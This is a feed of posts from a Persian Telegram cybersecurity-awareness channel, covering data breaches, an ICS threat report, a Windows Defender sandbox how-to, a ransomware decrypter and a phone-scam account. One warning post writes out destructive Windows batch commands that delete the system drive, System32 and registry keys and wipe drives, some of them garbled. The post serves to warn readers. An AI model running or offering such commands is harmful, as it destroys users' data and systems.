کانال تخصصی امنیت سایبری «کتاس»
1.74K subscribers
1.3K photos
302 videos
109 files
3.07K links
تماس با ادمين📧:
ict.sec@outlook.com

این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
پیتزا روباتیک


👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
پیر امیدیار؛ مبتکر ایرانی‌تبار بزرگترین فروشگاه آنلاین

پیر امیدیار، ۳۱ خردادماه سال ۱۳۴۶ در پاریس به دنیا آمد. مادرش دکترای زبان‌شناسی از دانشگاه سوربن دارد و پدرش جراح است. پیر در ۱۴ سالگی نخستین برنامه کامپیوتری را برای کتابخانه مدرسه‌اش نوشت. امیدیار تابستان سال ۱۹۹۵ در سایت شخصی‌اش کدی برای یک شبکه حراج می‌نویسد تا مردم به صورت آن‌لاین کالاهای‌شان را به حراج بگذارند. این نخستین کلید تاسیس شرکت ای‌بی بود. پیر در سال ۱۹۹۸ رئیس اصلی شرکت ای‌بی ‌شد. ای‌بی بیش از ۲۷ هزار نفر کارمند دارد. بر اساس گزارش سایت فوربس، درآمد جهانی ای‌بی از ۴.۶ میلیارد دلار در سال ۲۰۰۸ به ۷.۳ میلیارد دلار در سال ۲۰۱۲ رسیده است. پیر امیدیار یکی از ثروتمندترین اشخاص دنیا ست و با ۸.۵ میلیارد دلار دارایی در رتبه ۱۲۳ قرار دارد. پیر در سال ۱۹۹۹ با «پاملا» ازدواج کرد، آن‌ها سه فرزند دارند. او و همسرش پاملا فعالیت‌های خیرخواهانه زیادی انجام داده‌اند.

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔶 حمله سایبری به نیم میلیارد مسافر غول هتلداری جهان

هکرها به یکی از پلتفرم‌های اینترنتی هتل‌های زنجیره‌ای "مرییات" (Marriott) آمریکا حمله کردند. آن‌گونه که کنسرن مرییات اعلام کرده، داده‌های سامانه رزرو هتل‌های استاروود (Starwood) از سال ۲۰۱۴ به‌طور مرتب کپی و رمزگشایی شده و دی پی آن به احتمال داده‌های حدود نیم میلیارد مسافر از جمله نام، آدرس ایمیل، شماره کارت شناسایی و اطلاعات کارت اعتباری آنها به سرقت رفته است.

مرییات در سال ۲۰۱۶ هتل‌های زنجیره‌ای استاروود را که هتل‌های وستین، شرایتون و مریدین متعلق به آن هستند، خرید.
https://bit.ly/2Sn8zod
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
سایت مرکز لرزه‌نگاری کشوری دانشگاه تهران به آدرس http://irsc.ut.ac.ir/ آلوده به اسکریپت استخراج رمز ارز مبتنی بر مرورگر است.

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
Forwarded from IACS (Pedram Kiani)
چه کسانی امکانات و تجهیزات ICS را هدف قرار می دهند و چطور؟
چشم انداز تهدید ICS

تعداد حملات سایبری به سیستم های کنترل صنعتی به سرعت در حال افزایش است. بازیگران دولتی، مجرمان سایبری و هکوتیست ها آنها را تهدید می کنند. در ماه سپتامبر، کارشناسان امنیتی آزمایشگاه کسپرسکی گزارشی با عنوان «چشم انداز تهدید برای سیستم های اتوماسیون صنعتی» را برای سال های 2018 منتشر کردند که شامل اطلاعات مربوط به حملات علیه سیستم های ICS در شش ماه اول سال می شود. تعداد نمونه های مخرب که توسط Kaspersky تشخیص داده شده است بیش از 19،400 است و متعلق به حدود 2800 خانواده مخرب است که اکثر آنها تهدیدی خاص برای این دسته از دستگاه ها نیست. کارشناسان نشان دادند که اکثر آلودگی ها ناشی از حملات تصادفی است.

براساس گزارش Kaspersky، تعداد حملات علیه سیستم های ICS که توسط این شرکت محافظت می شود، به 41.2 درصد رسید. در مقایسه با نیمه اول سال 2017، کارشناسان میزان افزایش مجموعی تعداد عملیات حمله را 5 درصد اعلام کردند.

بیشتر حملات سیستم کامپیوتری را در کشورهایی که تولید ناخالص داخلی سرانه در آسیا، آمریکای لاتین و شمال آفریقا کم است، در حالی که در ایالات متحده تنها 21.4 درصد از سیستم های ICS را تحت تاثیر قرار داد،

با این حال، چندین منطقه از حملات مکرر و مخرب به سیستم های کنترل صنعتی خود رنج می بردند. در جنوب شرقی آسیا، بیش از 60 درصد ICS در نیمه اول سال 2018 مورد حمله قرار گرفتند؛ آفریقا در حدود 60 درصد از ICS مورد حمله قرار گرفت، با جنوب آسیا حدود 55 درصد، آسیای مرکزی حدود 53 درصد و روسیه 45 درصد است.

توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی نشان داد که کشورهایی که بیشترین تعداد حملات را به ترتیب درصد ویتنام (75.1 درصد)، الجزایر (71.6 درصد) و مراکش (65 درصد)، در حالی که امن ترین مناطق برای سیستم های ICS، دانمارک بود 14 درصد)، ایرلند (14.4 درصد) و سوئیس (15.9 درصد).


در حالی که بیشتر حملات از اینترنت بود، 27 درصد از حملات از منابع وب، 8.4 درصد از رسانه های قابل حمل قابل حمل استفاده می شد و فقط 3.8 درصد از مشتریان ایمیل بود.

"این الگو به نظر منطقی می رسد: شبکه های صنعتی مدرن به سختی می توانند از سیستم های خارجی جدا شوند. امروز، رابط کاربری بین شبکه صنعتی و شبکه شرکتی برای کنترل پروسس های صنعتی و مدیریت شبکه ها و سیستم های صنعتی مورد نیاز است.

در سال 2011، مهاجمان از وب سایت های قانونی برای میزبانی اجزای مخرب در آنها استفاده می کردند. محققان افزایش درصد رایانه های ICS که از طریق مرورگرها مورد حمله قرار گرفتند، به افزایش تعداد حملات که شامل معدنچیان cryptocurrency جاوااسکریپت بودند.

کارشناسان همچنین اشاره کردند که افزایش تعداد حملات با استفاده از اسناد مایکروسافت آفیس به عنوان بردار حمله (ورد، اکسل، RTF، پاورپوینت، Visio و غیره) همراه با کمپین های فیشینگ بود.

"محققان کسپرسکی در این گزارش اظهار داشتند:" در سال 2011، بازیگران تهدید به حمله به وب سایت های قانونی که آسیب پذیری در برنامه های وب خود را داشتند، برای میزبانی ابزارهای مخرب در این وب سایت ها ادامه یافت. " به طور مشخص، افزایش تعداد رایانه های ICS که از طریق مرورگرها در سال 2018 به طول انجامید، به دلیل افزایش تعداد حملات که شامل cryptocurrency جاوااسکریپت بود، افزایش یافت. در عین حال، افزایش تعداد کامپیوترهای ICS با استفاده از اسناد مایکروسافت آفیس با امواج ایمیل های فیشینگ همراه بود. "

اطلاعات بیشتر در مورد حملات علیه سیستم های ICS در سال 2018 H1 در نسخه کامل این گزارش موجود است.

🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Forwarded from IACS (Pedram Kiani)
شکل 1: توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی، H1 2018، درصد کامپیوترهای ICS مورد حمله در هر کشوری (منبع: آزمایشگاه کسپرسکی)

🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Forwarded from IACS (Pedram Kiani)
شکل 2: منابع اصلی تهدیدهای مسدود شده در رایانه های ICS (درصد رایانه های مورد حمله طی دوره های نیم سال) (منبع: آزمایشگاه کسپرسکی)

🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
هک ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگی‌های دیپلماتیک آلمان

آژانس امنیت داخلی آلمان اعلام کرده است که ایمیل تعدادی از قانونگذاران، نیروهای مسلح و نمایندگی‌های دیپلماتیک آلمان، هدف حمله هکرهای روسی قرار گرفته است. در ماه اکتبر نیز مقامات آلمانی اعلام کردند که حمله سایبری 2017 به وزارت خارجه آلمان توسط هکرهای روسی انجام گرفته است. اشپیگل نیز اعلام کرد که مقامات مبارزه با حملات سایبری آلمان اعلام کردند که حملات جدیدی علیه برخی دستگاه‌های این کشور انجام شده است که اکثر این حملات در چهاردهم نوامبر انجام گرفته ولی هنوز مشخص نیست که چه اطلاعاتی براساس این حملات مورد هدف بوده است. با این حال سخنگوی کرملین اعلام کرد که روسیه هیچ‌گونه دخالتی در امور کشورهای دیگر ندارد.
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
رشد حملات پردازش رایانه‌ها و سرقت داده‌ها

اقدامات متقلبانه مربوط به جرائم سوءاستفاده از رایانه، در طول یک دوره چهار درصد افزایش داشته که این امر به علت افزایش ۴۲ درصدی در مورد هک، رسانه‌های اجتماعی و ای‌میل است. مدیر امنیت سایبری در شرکت Redscan، گفته که بعضی از یافته‌ها را جدی نگیرید. ما نمی‌توانیم این واقعیت را نادیده بگیریم که به دلایل متعددی، بسیاری از جنایات دیجیتال گزارش‌شده است. در بسیاری از موارد، شناسایی فعالیت‌های جنایی مانند فیشینگ دشوار است و اکثراً مردم بی‌اطلاع از قربانی شدن هستند و توضیح می‌دهد که حملاتی که مجرمان توانایی پردازش رایانه‌ها را داشته و داده‌ها را برای برداشتن ارز دیجیتال به سرقت می‌برند، هم‌چنان به‌طور فزاینده‌ای در حال افزایش است.
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
بخش‌های حساس در حوزه امنیت سایبری

بخش‌های حساس در حوزه امنیت سایبری عبارتند از: مهاجمانی که فروشندگان سطح پایین زنجیره تامین را هدف قرار می دهند: مهاجمان سایبری الگوی حملات خود را تغییر داده اند. آن ها از اشخاص ثالث و رابع، برای ورود به سیستم های هدف استفاده می کنند. مجرمان سایبری، جاسوس ها و گروه های هکری همچنان به هدف قرار دادن فعالان زنجیره تامین، با هدف رسیدن به اهداف مالی و سیاسی خود، ادامه می دهند. حمله به زیرساخت های حیاتی: صنعت نفت و گاز، همچنان برای هکرها، یکی از اهداف بسیار محبوب به شمار می رود. حملات سایبری می توانند تاثیر قابل توجهی بر امنیت و اقتصاد تولید کنندگان و تامین کنندگان بخش انرژی داشته باشد. انگیزه های مالی حملات سایبری در حال افزایش هستند: گروه های هکری معروفی چون FIN7 و Cobalt Group، حملات سایبری خود را علیه موسسات مالی بزرگ و رستوران های زنجیره ای، افزایش داده اند. این گروه ها با به روزرسانی بدافزارهای خود، تهدیدی بزرگ به شمار می روند. رشد بدافزارها در قالب ابزار استخراج ارزهای دیجیتال: با توجه به افزایش اقبال جهانی به استخراج ارزهای رمزپایه، انتظار می رود که استفاده هکرها از تروجان های استخراج ارزهای دیجیتال نیز رشد قابل توجهی داشته باشد.
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
افزودن حالت سندباکس به آنتی‌ویروس ویندوز یا همان Windows Defender

ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرم‌افزار آنتی‌ویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.

سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستم‌عامل و برنامه‌های کاربردی بر روی رایانه اجرا می‌کند. به‌طوری‌که اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بسته‌شده می‌شود.

پس از کشف چندین آسیب‌پذیری بحرانی در سال‌های گذشته در چنین برنامه‌های قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه می‌داد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتی‌ویروس احساس می‌شد.

به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهره‌برداری کند و موتور آنتی‌ویروس را به خطر بیندازد، این آسیب نمی‌تواند به سایر قسمت‌های سیستم منتقل شود.

نحوه فعال کردن ویژگی سندباکس در آنتی‌ویروس Windows Defender

در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی می‌کند که به‌طور پیش‌فرض فعال نیست، اما شما می‌توانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:

سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:

سپس کامپیوتر خود را مجدداً راه‌اندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع

[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox

[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html

[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
🚨هشدار‼️‼️‼️
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.

🚨کدهای_مخرب محیط CMD ویندوز

-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...

--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !

-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !

off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00

-> حذف فایل مهم سیستمی "System32"

c:\WINDOWS\SYSTEM32\*.*/q

-> حذف تمامی ریجستری ها !

OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*

-> فرمت درایو ها (خودتون میتونید تغییرشون دهید)

D:\
rd/s/q C:\
rd/s/q E:\

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
عرضه ابزار رمزگشایی نسخه‌های جدید باج‌افزار STOP

از اواخر هفته گذشته کاربران و موسسات ایرانی هدف نسخه Pumas باج‌افزار STOP قرار گرفته‌اند.

خوشبختانه موسس سایت id-ransomware.malwarehunterteam.com با مشارکت یک محقق ایرانی موفق به ساخت ابزاری برای رمزگشایی فایل‌های رمزگذاری شده توسط نسخه‌های Puma،و Pumas و Pumax این باج‌افزار مخرب شده است.


ابزار مذکور از طریق لینک زیر قابل دریافت و استفاده است:

https://download.bleepingcomputer.com/demonslay335/STOPDecrypter.zip
توضیح این‌که به‌منظور شناسایی کلید رمزگذاری نیاز است که یک فایل رمز شده توسط باج‌افزار به همراه فایل اصلی آن (رمزگذاری نشده) در مسیر Settings | Bruteforcer به نرم‌افزار معرفی شود. حجم این دو فایل معرفی شده می‌بایست حداقل 150 کیلوبایت باشد.

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
‏گویا یک شرکت ⁧ #فینتک ⁩ چینی برای ارائه ⁧ #وام ⁩ از مشتریانش عکس لختی! می‌خواهد تا در صورتی که نتوانید بازپرداخت کنید، آن را منتشر کند و اگر استمهال بخواهید بازهم باید ویدیو بفرستید!!
‏مصرف‌گرایی و بی‌اخلاقی با همدیگر به اندازه کافی خطرناک هستند چه برسد با فناوری

منبع:
https://www.vice.com/amp/en_au/article/kzv38w/millennials-in-china-are-using-nudes-to-secure-loans?__twitter_impression=true

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
بازی با زبان سرخ
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
افرادی که از طریق یوتیوب درآمد میلیونی دارند

مجله فوربس کانال هایی را که بیشترین درآمد دارند را مشخص کرد.
به گزارش فوربس، بیشترین پرداختی یوتیوب به پسر هفت ساله ای به نام رایان بود که همراه والدین خود کانال "رایان اسباب بازی را ارزیابی می کند" را ایجاد کرده و در این کانال آنها به بررسی های اسباب بازی های مختلف می پردازند.

در این کانال بیش از 17 میلیون نفر ثبت نام کرده اند، که به لطف آن ویدئو وی 26 میلیارد بار مشاهده شده است. این کانال هر سال برای خانواده رایان 22 میلیون دلار به ارمغان می آورد.

نفردوم جیک پل است. او بیش از 17 میلیون ثبت نام کننده دارد که به طور مرتب ویدیوهای مختلف موسیقی و کمدی وی را تماشا می کند. درآمد سالانه او بیش از 21 میلیون دلار است.

رتبه سوم متعلق به گروه "دود پرفکت" است. پنج دوست در طول یک سال 20 میلیون دلار به خاطر فیلم هایی که در آن ترفندهایی را نشان دادند که با استفاده از وسایل مختلف از تجهیزات ورزشی گرفته تا یک بطری آب انجام می شد بدست آوردند. این کانال تقریبا 37 میلیون ثبت نام کننده دارد.

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴 قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با مایکروسافت

هدست واقعیت افزوده هولولنز در حال حاضر توسط ارتش های مختلف در دنیا برای آموزش و تمرین نیروها مورد استفاده قرار می گیرد. اما ارتش آمریکا به تازگی قراردادی با مایکروسافت (سازنده هولولنز) منعقد کرده که طبق آن، هدست مورد بحث در شرایط جنگی و برای عملیات های نظامی مورد استفاده قرار خواهد گرفت.

قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با کمپانی مایکروسافت که در راستای به روزرسانی نیروهای نظامی ایالات متحده تنظیم شده، قرار است برای افزایش کشندگی سربازان در میدان جنگ، توانایی تشخیص هدف، تصمیم گیری و درگیر شدن را پیش از آگاهی دشمن از شرایط فراهم کند. تعداد هدست های سفارش داده شده حداقل ۱۰۰ هزارتا اعلام شده است .

ارتش آمریکا به منظور تأمین نیاز خود، مناقصه ای برگزار کرد و طی آن از شرکت های غیر نظامی مانند مایکروسافت و مجیک لیپ برای ارائه طرح هایشان دعوت نمود.

ارتش برای هدست واقعیت افزوده مورد نظر الزاماتی دارد که عبارت اند از امکان دید در شب، سنجش تنفس و علائم حیاتی، محافظت از گوش ها و پایش ضربات وارده به سر. البته مشخص نیست مایکروسافت چگونه می خواهد الزامات مذکور را در هولولنز پیاده سازی کند.

هدست واقعیت افزوده هولولنز هیچوقت به صورت عمومی عرضه نشد و بیشتر توسط شرکت های مختلف به عنوان ابزاری برای تولید، آموزش، بازاریابی و سایر اهداف سازمانی مورد استفاده قرار گرفت. هدست مورد بحث همچنین توسط فضانوردان ایستگاه فضایی بین المللی نیز برای تمرینات خاص استفاده شده است.

بلومبرگ فارسی✔️

https://www.bloomberg.com/news/articles/2018-11-28/microsoft-wins-480-million-army-battlefield-contract
.
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
👁 داستان یک کلاهبرداری تلفنی

🔻شماره‌ی 9216148725 امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همه‌ی قبض‌هاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگ‌سازی!! دست داشتید و کمک کردید، توی قرعه‌کشی شرکت داده شدید و برنده شدید.
🔻پرسید صاحب خط خودتونید؟ گفتم بله. اسمم رو گفت و گفت این نام خودتونه؟ گفتم بله. گفت جایزه پنج ملیون تومن کمک‌هزینه سفر به عتبات عالیاته. الان برنامه‌ی ما زنده در حال پخشه، آقای آذری جهرمی مهمان برنامه هستن، وصلتون میکنیم لطفا صحبت سیاسی و اینها نکنید.
🔻مجری «برنامه!!» ازم یک‌سری سوال درباره نحوه و کیفیت سرویس‌های همراه اول پرسید و بعد گفت مبارکتون باشه، همکارانم الان برای دریافت هدیه راهنماییتون میکنن. صداش خیلی هم قطع و وصل میشد.
🔻نفر بعدی که باهام صحبت کرد، اطلاعات شخصی‌م (شماره‌ تلفن، زمانی که خط رو گرفتم، بانکهایی که توشون حساب دارم و شعبشون و شماره کارت‌هام و یک سری اطلاعات مثل نام والدینم) رو داشت و برام خوند. بعد گفت ما کمک‌هزینه رو در دو حواله‌ی ۲ملیون و ۵۰۰ی به دوتا کارت براتون واریز می‌کنیم.
🔻اما گفت باید همین الان برید از اون دوتا کارت ( بانکهایی که توشون حساب دارم رو نام برد) از خودپرداز موجودی بگیرید. گفتم کارتها همراهم نیست، گفت نیازه که قبل و بعد از واریز موجودی بگیرید، تا مطمئن بشید که مبلغ واریز شده. گفتم موجودیم رو میدونم. گفت رسید چاپی لازمه.
🔻من دیگه جدی شک کرده بودم، گفتم که الان نمیتونم برم دم خودپرداز، شماره‌ی مادرم رو گرفت و با هردوتامون صحبت کرد و گفت که باید برید دم خودپرداز موجودی بگیرید، و به مادرم گفت تماس رو قطع نکنید الان، بعد از گرفتن موجودی عدد ۱ رو بگیرید تا پروسه رو ادامه بدیم.
🔻ارتباط من رو قطع کرد، من اول تمام موجودی حسابم رو انتقال دادم به یه کارت دیگه، بعد زنگ زدم به همراه اول. با اپراتور صحبت کردم و شماره رو اعلام کردم، گفت مربوط به همراه اول نیست اصلا، هرچه زودتر از طریق مراجع قضایی پیگیری کنید تا کاری نکردن.
🔻توی این فاصله مادرم هم رفته بود دم خودپرداز و موجودیش رو انتقال داده بود به یه کارت دیگه. شخصی که باهاش صحبت میکرد، گفته چرا تراکنش انجام دادید و الان نمیشه ما بهتون واریز کنیم دیگه، بعد هم ازش خواسته بود که با حساب سپرده‌ش موجودی بگیره. مادرم هم گفته اون کارت دم دستم نیست.
🔻طرف گفته پس ما مقدار کمتری رو واریز می‌کنیم به حسابتون،‌ و یک‌سری مدارک نام برده که فردا با اینها برید بانک تا پول رو از حالت بلوکه دربیارید، و قطع کرده. مادرم با ۱۱۰ تماس گرفته و توضیح داده که چه اتفاقی افتاده، شماره رو اعلام کرده و گفتن که کلاه‌برداریه و پیگیری میکنن.
🔻شماره مجددا با من تماس گرفت، گفت ما یک مقداری از مبلغ رو نمی‌تونیم واریز کنیم، به جاش براتون دوماه مکالمه رایگان فعال میکنیم. گفتم باشه. گفت اس‌ام‌اس‌ش الان براتون میاد. منم گفتم باشه :))) و قطع کردم.
🔻هردو (من و مادرم) کارتهایی که باهاشون تراکنش انجام داده‌بودیم (هرچند که انتقال وجه بود) رو سوزوندیم و شماره رو به همراه اول و پلیس اعلام کردیم و بعد از توی گوشی بلاک کردیم و داستان تموم شد. اما هنوز برام ترسناکه که اون کلاهبردار، همه‌ی اطلاعتمون رو داشت.

منبع : توییتر

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
#ربات های گارسون
👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security
📲 مردم کوبا از امروز می‌توانند از اینترنت موبایل (تری جی) استفاده کنند.

🔸اتسکا، شرکت خدمات اینترنتی می‌گوید که شهروندان کوبایی از امروز می‌توانند برای برخورداری از این سرویس ثبت نام کنند.

🔸تا کنون در کوبا افراد از وای فای مکان‌های مختلف و کافه‌های اینترنتی استفاده می‌کردند و سرویس اینرنتی موبایل محدود به کارمندان دولت، خبرنگاران و تاجران خارجی بوده است.

🔹البته همچنان برای بسیاری در کوبا استفاده از اینترنت موبایل به دلیل هزینه بالای آن ممکن نخواهد بود.

👨🏻‍🎓👩🏻‍🎓کتاس آمادگی‌نشر نظرات و دیدگاه‌های شما را دارد
🦁«کتاس»
http://t.me/ict_security